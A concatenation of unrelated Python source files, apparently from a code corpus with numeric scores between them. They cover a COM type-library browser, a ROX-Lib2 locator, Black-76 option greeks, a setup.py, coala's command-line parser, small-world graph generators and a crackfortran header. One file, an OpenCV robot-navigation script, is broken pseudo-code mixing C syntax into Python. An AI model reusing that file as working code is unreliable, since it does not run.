            flags = info.GetImplTypeFlags(j)
            refInfo = info.GetRefTypeInfo(info.GetRefTypeOfImplType(j))
            doc = refInfo.GetDocumentation(-1)
            attr = refInfo.GetTypeAttr()
            typeKind = attr[5]
            typeFlags = attr[11]
            desc = doc[0]
            desc = desc + ", Flags=0x%x, typeKind=0x%x, typeFlags=0x%x" % (flags, typeKind, typeFlags)
            if flags & pythoncom.IMPLTYPEFLAG_FSOURCE:
                desc = desc + "(Source)"
            infos.append( ('Implements', desc))
        return infos

    def _GetMethodInfoTypes(self):
        """Detail rows for the selected member (func desc / help string)."""
        pos = self.memberlb.GetCurSel()
        if pos < 0: return []
        realPos, isMethod = self._GetRealMemberPos(pos)
        ret = []
        if isMethod:
            funcDesc = self.typeinfo.GetFuncDesc(realPos)
            id = funcDesc[0]
            ret.append(("Func Desc", str(funcDesc)))
        else:
            id = self.typeinfo.GetVarDesc(realPos)[0]
        docinfo = self.typeinfo.GetDocumentation(id)
        ret.append(('Help String', docinfo[1]))
        ret.append(('Help Context', str(docinfo[2])))
        return ret

    def CmdTypeListbox(self, id, code):
        """Type selection changed: list its variables, then its functions."""
        if code == win32con.LBN_SELCHANGE:
            pos = self.typelb.GetCurSel()
            if pos >= 0:
                self.memberlb.ResetContent()
                self.typeinfo = self.tlb.GetTypeInfo(pos)
                self.attr = self.typeinfo.GetTypeAttr()
                # attr[7] = cVars (variables), attr[6] = cFuncs (functions).
                for i in range(self.attr[7]):
                    id = self.typeinfo.GetVarDesc(i)[0]
                    self.memberlb.AddString(self.typeinfo.GetNames(id)[0])
                for i in range(self.attr[6]):
                    id = self.typeinfo.GetFuncDesc(i)[0]
                    self.memberlb.AddString(self.typeinfo.GetNames(id)[0])
                self.SetupAllInfoTypes()
            return 1

    def _GetRealMemberPos(self, pos):
        """Translate the member list-box index into (index, is_method).

        Variables fill the first attr[7] slots of the list box, functions the
        rest, mirroring the order CmdTypeListbox inserted them.
        """
        pos = self.memberlb.GetCurSel()
        if pos >= self.attr[7]:
            return pos - self.attr[7], 1
        elif pos >= 0:
            return pos, 0
        else:
            raise error("The position is not valid")

    def CmdMemberListbox(self, id, code):
        """Member selection changed: show a method's parameter names."""
        if code == win32con.LBN_SELCHANGE:
            self.paramlb.ResetContent()
            pos = self.memberlb.GetCurSel()
            realPos, isMethod = self._GetRealMemberPos(pos)
            if isMethod:
                id = self.typeinfo.GetFuncDesc(realPos)[0]
                names = self.typeinfo.GetNames(id)
                # names[0] is the method name itself; skip it.
                for i in range(len(names)):
                    if i > 0:
                        self.paramlb.AddString(names[i])
            self.SetupAllInfoTypes()
            return 1

    def GetTemplate(self):
        "Return the template used to create this dialog"
        w = 272 # Dialog width
        h = 192 # Dialog height
        style = FRAMEDLG_STD | win32con.WS_VISIBLE | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
        template = [['Type Library Browser', (0, 0, w, h), style, None, (8, 'Helv')], ]
        template.append([130, "&Type", -1, (10, 10, 62, 9), SS_STD | win32con.SS_LEFT])
        template.append([131, None, self.IDC_TYPELIST, (10, 20, 80, 80), LBS_STD])
        template.append([130, "&Members", -1, (100, 10, 62, 9), SS_STD | win32con.SS_LEFT])
        template.append([131, None, self.IDC_MEMBERLIST, (100, 20, 80, 80), LBS_STD])
        template.append([130, "&Parameters", -1, (190, 10, 62, 9), SS_STD | win32con.SS_LEFT])
        template.append([131, None, self.IDC_PARAMLIST, (190, 20, 75, 80), LBS_STD])
        lvStyle = SS_STD | commctrl.LVS_REPORT | commctrl.LVS_AUTOARRANGE | commctrl.LVS_ALIGNLEFT | win32con.WS_BORDER | win32con.WS_TABSTOP
        template.append(["SysListView32", "", self.IDC_LISTVIEW, (10, 110, 255, 65), lvStyle])
        return template

if __name__=='__main__':
    import sys
    fname = None
    try:
        fname = sys.argv[1]
    except:
        pass
    dlg = TypeBrowseDialog(fname)
    try:
        # With a console, run modally; otherwise attach to the Pythonwin frame.
        win32api.GetConsoleTitle()
        dlg.DoModal()
    except:
        dlg.CreateWindow(win32ui.GetMainFrame())
0.030731
# Most of the common code needed by ROX applications is in ROX-Lib2.
# Except this code, which is needed to find ROX-Lib2 in the first place!

# Just make sure you run findrox.version() before importing anything inside
# ROX-Lib2...

# NOTE(review): this is Python 2 code (`print >>` statement, the `string`
# module, GTK1 widget fallback) -- keep it that way.

import os, sys
from os.path import exists
import string

def version(major, minor, micro):
    """Find ROX-Lib2, with a version >= (major, minor, micro), and
    add it to sys.path. If version is missing or too old, either
    prompt the user, or (if possible) upgrade it automatically.
    If 'rox' is already in PYTHONPATH, just use that (assume the
    injector is being used)."""
    # 1) If 'rox' already imports, trust PYTHONPATH; only warn when the
    #    available copy is older than requested.
    try:
        import rox
    except ImportError:
        pass
    else:
        #print "Using ROX-Lib in PYTHONPATH"
        if (major, minor, micro) > rox.roxlib_version:
            print >>sys.stderr, "WARNING: ROX-Lib version " \
                "%d.%d.%d requested, but using version " \
                "%d.%d.%d from %s" % \
                (major, minor, micro,
                 rox.roxlib_version[0],
                 rox.roxlib_version[1],
                 rox.roxlib_version[2],
                 rox.__file__)
        return

    # 2) Zero Install: use the cached ROX-Lib2, refreshing it if missing
    #    or older than requested.
    if not os.getenv('ROXLIB_DISABLE_ZEROINSTALL') and os.path.exists('/uri/0install/rox.sourceforge.net'):
        # We're using ZeroInstall. Good :-)
        zpath = '/uri/0install/rox.sourceforge.net/lib/ROX-Lib2/' \
            'latest-2'
        if not os.path.exists(zpath):
            os.system('0refresh rox.sourceforge.net')
            assert os.path.exists(zpath)
        # 'latest-2' is a symlink whose target ends with the version number.
        vs = os.readlink(zpath).split('-')[-1]
        v = tuple(map(int, vs.split('.')))
        if v < (major, minor, micro):
            # os.system returns non-zero on failure.
            if os.system('0refresh rox.sourceforge.net'):
                report_error('Using ROX-Lib in Zero Install, but cached version (%s) is too old (need %d.%d.%d) and updating failed (is zero-install running?)' % (vs, major, minor, micro))
        sys.path.append(zpath + '/python')
        return

    # 3) Fall back to scanning LIBDIRPATH (or the standard library dirs)
    #    for a ROX-Lib2 directory.
    try:
        path = os.environ['LIBDIRPATH']
        paths = string.split(path, ':')
    except KeyError:
        paths = [os.environ['HOME'] + '/lib',
                 '/usr/local/lib', '/usr/lib']

    for p in paths:
        p = os.path.join(p, 'ROX-Lib2')
        if exists(p):
            # TODO: check version is new enough
            sys.path.append(os.path.join(p, 'python'))
            import rox
            if major == 1 and minor == 9 and micro < 10:
                return # Can't check version
            if not hasattr(rox, 'roxlib_version'):
                break
            if (major, minor, micro) <= rox.roxlib_version:
                return # OK
    report_error("This program needs ROX-Lib2 (version %d.%d.%d) " % \
        (major, minor, micro) + "to run.\n" + \
        "I tried all of these places:\n\n" + \
        string.join(paths, '\n') + '\n\n' + \
        "ROX-Lib2 is available from:\n" + \
        "http://rox.sourceforge.net")

def report_error(err):
    "Write 'error' to stderr and, if possible, display a dialog box too."
    try:
        sys.stderr.write('*** ' + err + '\n')
    except:
        pass
    try:
        # Prefer pygtk/GTK2 bindings...
        import pygtk; pygtk.require('2.0')
        import gtk; g = gtk
    except:
        # ...fall back to GTK1 widget names when pygtk2 is absent.
        import gtk
        win = gtk.GtkDialog()
        message = gtk.GtkLabel(err + '\n\nAlso, pygtk2 needs to be present')
        win.set_title('Missing ROX-Lib2')
        win.set_position(gtk.WIN_POS_CENTER)
        message.set_padding(20, 20)
        win.vbox.pack_start(message)
        ok = gtk.GtkButton("OK")
        ok.set_flags(gtk.CAN_DEFAULT)
        win.action_area.pack_start(ok)
        ok.connect('clicked', gtk.mainquit)
        ok.grab_default()
        win.connect('destroy', gtk.mainquit)
        win.show_all()
        gtk.mainloop()
    else:
        box = g.MessageDialog(None, g.MESSAGE_ERROR, 0, g.BUTTONS_OK, err)
        box.set_title('Missing ROX-Lib2')
        box.set_position(g.WIN_POS_CENTER)
        box.set_default_response(g.RESPONSE_OK)
        box.run()
    sys.exit(1)
0.035424
from scipy import stats
from math import log, pow, sqrt, exp
from typing import Tuple

# Standard-normal CDF/PDF used by every pricing formula below.
cdf = stats.norm.cdf
pdf = stats.norm.pdf

# NOTE(review): d1 omits the usual r*t drift term while every price/greek is
# discounted by exp(-r * t).  That matches the Black (1976) model for options
# on futures (s is a futures/forward price) -- confirm with callers before
# reusing this module for spot underlyings.


def calculate_d1(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float
) -> float:
    """Calculate option D1 value.

    s: underlying price, k: strike, r: rate, t: time to expiry (years),
    v: volatility.  Caller must ensure v > 0 and t > 0.
    """
    d1: float = (log(s / k) + (0.5 * pow(v, 2)) * t) / (v * sqrt(t))
    return d1


def calculate_price(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    cp: int,
    d1: float = 0.0
) -> float:
    """Calculate option price (cp = 1 for call, -1 for put).

    A precomputed d1 may be passed to avoid recomputation.
    """
    # Return option space (exercise) value if volatility not positive
    if v <= 0:
        return max(0, cp * (s - k))

    if not d1:
        d1 = calculate_d1(s, k, r, t, v)
    d2: float = d1 - v * sqrt(t)

    price: float = cp * (s * cdf(cp * d1) - k * cdf(cp * d2)) * exp(-r * t)
    return price


def calculate_delta(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    cp: int,
    d1: float = 0.0
) -> float:
    """Calculate option delta, scaled by s * 0.01 (delta per 1% move)."""
    if v <= 0:
        return 0

    if not d1:
        d1 = calculate_d1(s, k, r, t, v)

    _delta: float = cp * exp(-r * t) * cdf(cp * d1)
    delta: float = _delta * s * 0.01
    return delta


def calculate_gamma(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    d1: float = 0.0
) -> float:
    """Calculate option gamma, scaled by s**2 * 0.0001."""
    if v <= 0:
        return 0

    if not d1:
        d1 = calculate_d1(s, k, r, t, v)

    _gamma: float = exp(-r * t) * pdf(d1) / (s * v * sqrt(t))
    gamma: float = _gamma * pow(s, 2) * 0.0001
    return gamma


def calculate_theta(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    cp: int,
    d1: float = 0.0,
    annual_days: int = 240
) -> float:
    """Calculate option theta (time decay per trading day)."""
    if v <= 0:
        return 0

    if not d1:
        d1 = calculate_d1(s, k, r, t, v)
    d2: float = d1 - v * sqrt(t)

    _theta = -s * exp(-r * t) * pdf(d1) * v / (2 * sqrt(t)) \
        + cp * r * s * exp(-r * t) * cdf(cp * d1) \
        - cp * r * k * exp(-r * t) * cdf(cp * d2)
    theta = _theta / annual_days
    return theta


def calculate_vega(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    d1: float = 0.0
) -> float:
    """Calculate option vega(%): price change per 1% volatility move."""
    vega: float = calculate_original_vega(s, k, r, t, v, d1) / 100
    return vega


def calculate_original_vega(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    d1: float = 0.0
) -> float:
    """Calculate option vega (per unit of volatility)."""
    if v <= 0:
        return 0

    if not d1:
        d1 = calculate_d1(s, k, r, t, v)

    vega: float = s * exp(-r * t) * pdf(d1) * sqrt(t)
    return vega


def calculate_greeks(
    s: float,
    k: float,
    r: float,
    t: float,
    v: float,
    cp: int,
    annual_days: int = 240
) -> Tuple[float, float, float, float, float]:
    """Calculate option price and greeks in one pass (d1 computed once)."""
    d1: float = calculate_d1(s, k, r, t, v)
    price: float = calculate_price(s, k, r, t, v, cp, d1)
    delta: float = calculate_delta(s, k, r, t, v, cp, d1)
    gamma: float = calculate_gamma(s, k, r, t, v, d1)
    theta: float = calculate_theta(s, k, r, t, v, cp, d1, annual_days)
    vega: float = calculate_vega(s, k, r, t, v, d1)
    return price, delta, gamma, theta, vega


def calculate_impv(
    price: float,
    s: float,
    k: float,
    r: float,
    t: float,
    cp: int
):
    """Calculate option implied volatility via Newton's method.

    Returns 0 when the quote is non-positive or below exercise value.
    """
    # Check option price must be positive
    if price <= 0:
        return 0

    # Check if option price meets minimum value (exercise value)
    meet: bool = False

    if cp == 1 and (price > (s - k) * exp(-r * t)):
        meet = True
    elif cp == -1 and (price > k * exp(-r * t) - s):
        meet = True

    # If minimum value not met, return 0
    if not meet:
        return 0

    # Calculate implied volatility with Newton's method
    v: float = 0.01     # Initial guess of volatility

    for _ in range(50):
        # Calculate option price and vega with current guess
        p: float = calculate_price(s, k, r, t, v, cp)
        # BUG FIX: the sixth positional parameter of calculate_original_vega
        # is d1, not cp; the original passed `cp` (+/-1) here, which made
        # vega be evaluated at a fixed d1 of +/-1 instead of the current v.
        vega: float = calculate_original_vega(s, k, r, t, v)

        # Break loop if vega too close to 0
        if not vega:
            break

        # Calculate error value
        dx: float = (price - p) / vega

        # Check if error value meets requirement
        if abs(dx) < 0.00001:
            break

        # Calculate guessed implied volatility of next round
        v += dx

    # Check end result to be non-negative
    if v <= 0:
        return 0

    # Round to 4 decimal places
    v = round(v, 4)
    return v
0
"""A setup module for the GAPIC Google Cloud Speech API library. See: https://packaging.python.org/en/latest/distributing.html https://github.com/pypa/sampleproject """ from setuptools import setup, find_packages import sys install_requires = [ 'google-gax>=0.15.7, <0.16dev', 'oauth2client>=2.0.0, <4.0dev', 'proto-google-cloud-speech-v1[grpc]>=0.15.4, <0.16dev', 'googleapis-common-protos[grpc]>=1.5.2, <2.0dev', ] setup( name='gapic-google-cloud-speech-v1', version='0.15.4', author='Google Inc', author_email='googleapis-packages@google.com', classifiers=[ 'Intended Audience :: Developers', 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: Implementation :: CPython', ], description='GAPIC library for the Google Cloud Speech API', include_package_data=True, long_description=open('README.rst').read(), install_requires=install_requires, license='Apache-2.0', packages=find_packages(), namespace_packages=[ 'google', 'google.cloud', 'google.cloud.gapic', 'google.cloud.gapic.speech' ], url='https://github.com/googleapis/googleapis')
0
import argparse

from coalib.misc import Constants
from coalib.collecting.Collectors import get_all_bears_names
from coalib.parsing.FilterHelper import available_filters


class CustomFormatter(argparse.RawDescriptionHelpFormatter):
    """
    A Custom Formatter that will keep the metavars in the usage
    but remove them in the more detailed arguments section.
    """

    def _format_action_invocation(self, action):
        if not action.option_strings:
            # For arguments that don't have options strings
            metavar, = self._metavar_formatter(action, action.dest)(1)
            return metavar
        else:
            # Option string arguments (like "-f, --files")
            parts = action.option_strings
            return ', '.join(parts)


def default_arg_parser(formatter_class=None):
    """
    This function creates an ArgParser to parse command line
    arguments.

    :param formatter_class: Formatting the arg_parser output into a specific
                            form. For example: In the manpage format.
    """
    formatter_class = (CustomFormatter if formatter_class is None
                       else formatter_class)

    # NOTE(review): the exact line breaks of this reST description were lost
    # in transit and have been reconstructed; the wording is unchanged.
    description = """
coala provides a common command-line interface for linting and fixing all
your code, regardless of the programming languages you use.

To find out what kind of analysis coala offers for the languages you use,
visit http://coala.io/languages, or run::

    $ coala --show-bears --filter-by-language C Python

To perform code analysis, simply specify the analysis routines (bears) and
the files you want it to run on, for example:

    spaceBear::

        $ coala --bears SpaceConsistencyBear --files **.py

coala can also automatically fix your code:

    spacePatchBear::

        $ coala --bears SpaceConsistencyBear --files **.py --apply-patches

To run coala without user interaction, run the `coala --non-interactive`,
`coala --json` and `coala --format` commands.
"""

    arg_parser = argparse.ArgumentParser(
        formatter_class=formatter_class,
        prog='coala',
        description=description,
        # Use our own help so that we can put it in the group we want
        add_help=False)

    # Positional arguments: section names to run exclusively.
    arg_parser.add_argument('TARGETS',
                            nargs='*',
                            help='sections to be executed exclusively')

    info_group = arg_parser.add_argument_group('Info')

    info_group.add_argument('-h',
                            '--help',
                            action='help',
                            help='show this help message and exit')

    info_group.add_argument('-v',
                            '--version',
                            action='version',
                            version=Constants.VERSION)

    mode_group = arg_parser.add_argument_group('Mode')

    mode_group.add_argument(
        '-C', '--non-interactive',
        const=True,
        action='store_const',
        help='run coala in non interactive mode')

    mode_group.add_argument(
        '--ci',
        action='store_const',
        dest='non_interactive',
        const=True,
        help='continuous integration run, alias for `--non-interactive`')

    mode_group.add_argument(
        '--json',
        const=True,
        action='store_const',
        help='mode in which coala will display output as json')

    mode_group.add_argument(
        '--format',
        const=True,
        nargs='?',
        metavar='STR',
        help='output results with a custom format string, e.g. '
             '"Message: {message}"; possible placeholders: '
             'id, origin, file, line, end_line, column, end_column, '
             'severity, severity_str, message, message_base, '
             'message_arguments, affected_code, source_lines')

    config_group = arg_parser.add_argument_group('Configuration')

    config_group.add_argument(
        '-c', '--config',
        nargs=1,
        metavar='FILE',
        help='configuration file to be used, defaults to {}'.format(
            Constants.default_coafile))

    config_group.add_argument(
        '-F', '--find-config',
        action='store_const',
        const=True,
        help='find {} in ancestors of the working directory'.format(
            Constants.default_coafile))

    config_group.add_argument(
        '-I', '--no-config',
        const=True,
        action='store_const',
        help='run without using any config file')

    config_group.add_argument(
        '-s', '--save',
        nargs='?',
        const=True,
        metavar='FILE',
        help='save used arguments to a config file to a {}, the given path, '
             'or at the value of -c'.format(Constants.default_coafile))

    config_group.add_argument(
        '--disable-caching',
        const=True,
        action='store_const',
        help='run on all files even if unchanged')

    config_group.add_argument(
        '--flush-cache',
        const=True,
        action='store_const',
        help='rebuild the file cache')

    config_group.add_argument(
        '--no-autoapply-warn',
        const=True,
        action='store_const',
        help='turn off warning about patches not being auto applicable')

    inputs_group = arg_parser.add_argument_group('Inputs')

    # `.completer` enables shell completion of bear names via argcomplete.
    inputs_group.add_argument(
        '-b', '--bears',
        nargs='+',
        metavar='NAME',
        help='names of bears to use').completer = (
            lambda *args, **kwargs: get_all_bears_names())  # pragma: no cover

    inputs_group.add_argument(
        '-f', '--files',
        nargs='+',
        metavar='FILE',
        help='files that should be checked')

    inputs_group.add_argument(
        '-i', '--ignore',
        nargs='+',
        metavar='FILE',
        help='files that should be ignored')

    inputs_group.add_argument(
        '--limit-files',
        nargs='+',
        metavar='FILE',
        help="filter the `--files` argument's matches further")

    inputs_group.add_argument(
        '-d', '--bear-dirs',
        nargs='+',
        metavar='DIR',
        help='additional directories which may contain bears')

    outputs_group = arg_parser.add_argument_group('Outputs')

    outputs_group.add_argument(
        '-V', '--verbose',
        action='store_const',
        dest='log_level',
        const='DEBUG',
        help='alias for `-L DEBUG`')

    outputs_group.add_argument(
        '-L', '--log-level',
        nargs=1,
        choices=['ERROR', 'INFO', 'WARNING', 'DEBUG'],
        metavar='ENUM',
        help='set log output level to DEBUG/INFO/WARNING/ERROR, '
             'defaults to INFO')

    outputs_group.add_argument(
        '-m', '--min-severity',
        nargs=1,
        choices=('INFO', 'NORMAL', 'MAJOR'),
        metavar='ENUM',
        help='set minimal result severity to INFO/NORMAL/MAJOR')

    outputs_group.add_argument(
        '-N', '--no-color',
        const=True,
        action='store_const',
        help='display output without coloring (excluding logs)')

    outputs_group.add_argument(
        '-B', '--show-bears',
        const=True,
        action='store_const',
        help='list all bears')

    outputs_group.add_argument(
        '-l', '--filter-by-language',
        nargs='+',
        metavar='LANG',
        help='filters `--show-bears` by the given languages')

    outputs_group.add_argument(
        '--filter-by',
        action='append',
        nargs='+',
        metavar=('FILTER_NAME FILTER_ARG', 'FILTER_ARG'),
        help='filters `--show-bears` by the filter given as argument. '
             'Available filters: {}'.format(', '.join(sorted(
                 available_filters))))

    outputs_group.add_argument(
        '-p', '--show-capabilities',
        nargs='+',
        metavar='LANG',
        help='show what coala can fix and detect for the given languages')

    outputs_group.add_argument(
        '-D', '--show-description',
        const=True,
        action='store_const',
        help='show bear descriptions for `--show-bears`')

    outputs_group.add_argument(
        '--show-details',
        const=True,
        action='store_const',
        help='show bear details for `--show-bears`')

    outputs_group.add_argument(
        '--log-json',
        const=True,
        action='store_const',
        help='output logs as json along with results'
             ' (must be called with --json)')

    outputs_group.add_argument(
        '-o', '--output',
        nargs=1,
        metavar='FILE',
        help='write results to the given file (must be called with --json)')

    outputs_group.add_argument(
        '-r', '--relpath',
        nargs='?',
        const=True,
        help='return relative paths for files (must be called with --json)')

    misc_group = arg_parser.add_argument_group('Miscellaneous')

    misc_group.add_argument(
        '-S', '--settings',
        nargs='+',
        metavar='SETTING',
        help='arbitrary settings in the form of section.key=value')

    misc_group.add_argument(
        '-a', '--apply-patches',
        action='store_const',
        dest='default_actions',
        const='*: ApplyPatchAction',
        help='apply all patches automatically if possible')

    misc_group.add_argument(
        '-j', '--jobs',
        type=int,
        help='number of jobs to use in parallel')

    misc_group.add_argument(
        '-n', '--no-orig',
        const=True,
        action='store_const',
        help="don't create .orig backup files before patching")

    misc_group.add_argument(
        '-A', '--single-action',
        const=True,
        action='store_const',
        help='apply a single action for all results')

    misc_group.add_argument(
        '--debug',
        const=True,
        action='store_const',
        help='run coala in debug mode, starting ipdb, '
             'which must be separately installed, '
             'on unexpected internal exceptions '
             '(implies --verbose)')

    try:
        # Auto completion should be optional, because of somewhat complicated
        # setup.
        import argcomplete
        argcomplete.autocomplete(arg_parser)
    except ImportError:  # pragma: no cover
        pass

    return arg_parser
0
#!/usr/bin/python

import random
import math

# n is the number of nodes
# r is the radius of each node (a node u is connected with each other node at
# distance at most r) - strong ties
# k is the number of random edges for each node u - weak ties
def WSGridGraph(n, r, k):
    """Watts-Strogatz-style graph on a sqrt(n) x sqrt(n) grid.

    Strong ties connect every pair of nodes within Manhattan distance r;
    weak ties add k uniformly random edges per node (no self-loops).
    Returns a dict mapping node id (in [0, n-1]) -> set of neighbour ids.
    """
    line = int(math.sqrt(n))
    graph = dict()
    # Initialization: each node is identified by a number in [0, n - 1]
    for i in range(line):          # i represents the grid row
        for j in range(line):      # j represents the grid column
            graph[i*line+j] = set()

    for i in range(line):
        for j in range(line):
            # Strong ties: connect (i, j) to every node at Manhattan distance
            # at most r.  Each unordered pair is added once, from its
            # smaller-row endpoint (and, within the same row, from its
            # smaller-column endpoint); this requires the column offset y to
            # take NEGATIVE values when the row offset x is positive.
            # BUG FIX: the original only used non-negative offsets, which
            # silently dropped "diagonal" pairs such as (i, j)-(i+1, j-1)
            # even though their Manhattan distance is <= r.
            for x in range(r + 1):
                if x == 0:
                    y_offsets = range(1, r + 1)            # same row: rightwards only
                else:
                    y_offsets = range(-(r - x), r - x + 1)  # |x| + |y| <= r
                for y in y_offsets:
                    if 0 <= i + x < line and 0 <= j + y < line:
                        graph[i*line+j].add((i+x)*line+(j+y))
                        graph[(i+x)*line+(j+y)].add(i*line+j)
            # Weak ties: for each node u, add an edge to k randomly chosen nodes
            for h in range(k):
                s = random.randint(0, n-1)
                if s != i*line+j:
                    graph[i*line+j].add(s)
                    graph[s].add(i*line+j)
    return graph

# n is the number of nodes
# r is the radius
# k is the number of random edges
def WS2DGraph(n, r, k):
    """Watts-Strogatz-style graph on random points in a square.

    Each node gets a uniform position in [0, line] x [0, line]; strong ties
    connect pairs within Euclidean distance r, weak ties add k random edges
    per node.  Returns a dict: node -> {"x": ..., "y": ..., "list": set()}.
    """
    line = int(math.sqrt(n))
    graph = dict()
    # Initialization: place each node uniformly at random in the square
    for i in range(n):
        x = random.random()
        y = random.random()
        graph[i] = dict()
        graph[i]["x"] = x*line
        graph[i]["y"] = y*line
        graph[i]["list"] = set()

    for i in range(n):
        # Strong ties: edge to each node at Euclidean distance at most r
        for j in range(i+1, n):
            # Euclidean distance between i and j
            dist = math.sqrt((graph[i]["x"]-graph[j]["x"])**2
                             + (graph[i]["y"]-graph[j]["y"])**2)
            if dist <= r:
                graph[i]["list"].add(j)
                graph[j]["list"].add(i)
        # Weak ties: for each node u, add an edge to k randomly chosen nodes
        for h in range(k):
            s = random.randint(0, n-1)
            if s != i:
                graph[i]["list"].add(s)
                graph[s]["list"].add(i)
    return graph

def countEdges(graph):
    """Number of undirected edges in an adjacency-set graph (as built by
    WSGridGraph); each edge is stored once per endpoint, hence the halving."""
    edges = 0
    for k in graph.keys():
        edges += len(graph[k])
    return int(edges/2)
0.034741
class RecordOverwriteError(Exception): '''Raised when attempting to overwrite existing recorded relationships.''' def __init__(self, message, errors): super(RecordOverwriteError, self).__init__(message) self.errors = errors class ReferenceUnimportedContent(Exception): '''Raised when referencing content that has not been imported.''' def __init__(self, message, errors): super(ReferenceUnimportedContent, self).__init__(message) self.errors = errors class PageNotImportable(Exception): '''Raised when attempting to create page.''' def __init__(self, message, errors): super(PageNotImportable, self).__init__(message) self.errors = errors class ImportedPageNotSavable(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImportedPageNotSavable, self).__init__(message) self.errors = errors class ImageInfoListFetchFailed(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImageInfoListFetchFailed, self).__init__(message) self.errors = errors class ImageInfoFetchFailed(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImageInfoFetchFailed, self).__init__(message) self.errors = errors class ImageCreationFailed(Exception): def __init__(self, message, errors): super(ImageCreationFailed, self).__init__(message) self.errors = errors class ImportedContentInvalid(Exception): def __init__(self, message, errors): super(ImportedContentInvalid, self).__init__(message) self.errors = errors
0
#!/usr/bin/env python import sys import matplotlib.pyplot as plt import argparse from utilities import filesFromList, inputIfNone from plotTools import userLabels, plotXX ''' Description: A script to plot multiple files with data in [x, y1, y2, ..., yn] format. Run the script in the directory where you have the data files: $ uniplot.py <search string> [options] Author: Mikko Auvinen mikko.auvinen@helsinki.fi University of Helsinki & Finnish Meteorological Institute ''' #=======MAIN PROGRAM========================================# parser = argparse.ArgumentParser() parser.add_argument("strKey", nargs='?', default=None,\ help="Search string for collecting files.") parser.add_argument("--log", action="store_true", default=False,\ help="Logarithmic y-axis.") parser.add_argument("--labels", action="store_true", default=False,\ help="User specified labels.") parser.add_argument("-fx", "--factorX", type=float, default=1.0,\ help="Multiplication factor for x-values: fx*x") parser.add_argument("-fy", "--factorY", type=float, default=1.0,\ help="Multiplication factor for y-values: fy*y") parser.add_argument("-s", "--save", type=str, default=None, \ help="Name of the saved figure. Default=None") args = parser.parse_args() #==========================================================# # Rename ... strKey = args.strKey factorX = args.factorX factorY = args.factorY logOn = args.log labelsOn= args.labels saveFig = args.save strKey = inputIfNone( strKey , " Enter search string: " ) plt.rc('xtick', labelsize=24); #plt.rc('ytick.major', size=10) plt.rc('ytick', labelsize=24); #plt.rc('ytick.minor', size=6) while 1: fileNos, fileList = filesFromList( "*"+strKey+"*" ) pfig = plt.figure(num=1, figsize=(12.,9.5)); for fn in fileNos: pfig = plotXX( pfig, fileList[fn], logOn, factorX, factorY ) if( labelsOn ): pfig = userLabels( pfig ) plt.grid(True) plt.legend(loc=0) if( saveFig ): pfig.savefig( saveFig, format='jpg', dpi=300) plt.show()
0.025136
import numpy as np import cv2 #calibration variables startingPositon startingDirection vec2 OriginalDesiredDirection float DistanceOfGoal; float ExtraDistancel DesiredEndPosition = SetNewEndPoint(OriginalDesiredDirection, DistanceOfGoal); shapeToStayIn; #----------getting the imediate collisions ------------ #image = cv2.VideoCapture(0) image = cv2.OpenImage("/home/chris/Pictures/TestImages/BirdsEye.jpg2"); startColour = { 167, 166, 174}; endColour = { 218, 205, 189 }; theFloor = cv2.inRange(image, startColour, endColour); countours = cv2.findContours(theFloor, mode, method); shapeToStayIn = countours; #-------------------------- #CreateGrid RaceOnLoop() { if(HasCrossedLine()) { End; } if(HasReachedEndPoint() && !HasCrossedLine()) { DiffFromDesiredDirection = OriginalDesiredDirection - CurrentDirection; SetNewEndPoint(DiffFromDesiredDirection, ExtraDistance); } RecreateAStarGrid(); WorkOutPositionOnGrid(); SetNewEndPointToAStarTarget(); } CentreOfCircle() { if(HasReachedCentre()) { End; } if(KnowsCentre()) { MoveTowardsEndPoint(); } else { if(!FoundArcLine) { MoveForward() ScanForArc(); } else #Found arc, not processed { KnowsCentre = WorkOutCentreFromArc(); } } } #this would work best if using behavours #the robot would "pursue" an end point #the end point would "pursue" something directly in front of the robot BUT #would colide with something slightly bigger thencircle GoRoundCircle { if(!FoundLine) { MoveForward() ScanForArc(); } else { if(DistanceFromArc > allowedFarDistance) { MoveTowardsArc; } else if(DistanceFromArc < allowedNearDistance) { MoveAwayFromArc; } } } #----------IGNOR-----get goal intellegently------------------------- #get rid of floor image = cv2.OpenImage("/home/chris/Pictures/TestImages/FirstPosition.jpg theFloor = cv2.inRange(image, startColour, endColour); noFloor = cv2.subtract(theFloor, image); horizonEye = cropImage(theFloor, bottom+1); #this would crop the image to a 1D texture furthestPoint = depthTest(horizonEye); #find the part in 
the image furthest away. goal = translateToBirdseyePlane(furthestPoint); set(furthestPoint); #cv2.findContours( cv2. cap.release() cv2.destroyAllWindows()
0.038279
#!/usr/bin/env python """ crackfortran --- read fortran (77,90) code and extract declaration information. Usage is explained in the comment block below. Copyright 1999-2004 Pearu Peterson all rights reserved, Pearu Peterson <pearu@ioc.ee> Permission to use, modify, and distribute this software is given under the terms of the NumPy License. NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. $Date: 2005/09/27 07:13:49 $ Pearu Peterson """ __version__ = "$Revision: 1.177 $"[10:-1] import platform import __version__ f2py_version = __version__.version """ Usage of crackfortran: ====================== Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename> -m <module name for f77 routines>,--ignore-contains Functions: crackfortran, crack2fortran The following Fortran statements/constructions are supported (or will be if needed): block data,byte,call,character,common,complex,contains,data, dimension,double complex,double precision,end,external,function, implicit,integer,intent,interface,intrinsic, logical,module,optional,parameter,private,public, program,real,(sequence?),subroutine,type,use,virtual, include,pythonmodule Note: 'virtual' is mapped to 'dimension'. Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug). Note: code after 'contains' will be ignored until its scope ends. Note: 'common' statement is extended: dimensions are moved to variable definitions Note: f2py directive: 